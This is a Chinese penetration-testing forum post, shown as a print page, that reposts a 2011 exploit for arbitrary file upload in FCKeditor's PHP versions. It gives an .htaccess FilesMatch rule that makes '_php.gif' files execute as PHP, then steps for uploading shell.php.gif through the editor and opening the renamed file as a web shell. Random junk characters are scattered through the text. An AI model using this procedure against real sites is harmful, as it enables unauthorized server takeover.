中国网络渗透测试联盟

标题: FCKeditor所有php版本Upload上传漏洞 [打印本页]
作者: admin    时间: 2013-10-27 17:25
标题: FCKeditor所有php版本Upload上传漏洞
FCKeditor所有php版本Upload上传漏洞
: K- G5 Y& G6 i, i* n7 D( Q作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
1 `: e" \) k) ]) p* B5 M3 \7 R2 h减小字体 增大字体$ @; M4 @" N8 W
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
$ J/ t& Y( c' O  e  J! r) S2 b[+] Date: 2011* T- L: J* G0 Z
[+] Author : sinesafe.cn
, a( I- |) n# ]$ u[+] Website : WwW.sinesafe.cn
. }: @- {: ]3 t( c———————————————————
- M4 q! `4 Y- B, [" Z) N& K1 b1.create a htaccess file:
5 S* G# D( H. ?code:
, u$ u  q7 N* O2 o% V7 C<FilesMatch “_php.gif”>
3 E( x! W. z& F6 M9 QSetHandler application/x-httpd-php* I( b3 ?$ d) L
</FilesMatch>
8 U5 o% [) K% c- h+ T% a4 w" A# d2 V" Y. O, m; N
2.Now upload this htaccess with FCKeditor.
3 s! X$ U  P( |4 b" t* R( a
1 P4 R# M  L: x! Shttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
. a+ _8 V6 Z9 Z5 j. @% [" y, Z5 v  u7 o* W6 t8 h3 `) Z5 T
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html  E$ |+ U# a# @- o3 A( P/ N
- a7 o; z8 Y/ K- w
———————————————————————————————-" X0 t/ k6 i7 Z1 P" M: g
3.Now upload shell.php.gif with FCKeditor.
% S5 X$ B1 X. A4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.. ]+ o3 ^5 C8 i- a
5.http://www.sinesafe.cn/anything/shell_php.gif$ a: F1 r" ]2 S4 ~2 C
6.Now shell is available from server.

- R1 w6 \2 O5 \- C( O( O" ~1 p7 K, A* t, c" r) `# n" n
# x) n  L1 u  P- B; l6 D




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2